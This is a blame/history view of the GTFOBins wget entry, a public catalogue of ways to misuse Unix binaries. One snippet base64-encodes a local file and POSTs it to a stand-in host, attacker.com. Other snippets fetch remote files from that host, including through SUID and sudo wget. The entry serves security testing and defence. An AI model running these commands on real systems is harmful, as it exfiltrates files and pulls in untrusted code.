GTFOBins.github.io/_gtfobins/wget.md

28 lines
952 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
upload:
2018-07-16 15:01:50 +02:00
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
export LFILE=file_to_send
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
2018-05-21 21:14:41 +02:00
download:
2018-07-16 15:01:50 +02:00
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
wget $URL -O $LFILE
suid-enabled:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
./wget $URL -O $LFILE
sudo-enabled:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
sudo -E wget $URL -O $LFILE
2018-05-25 01:10:39 +02:00
---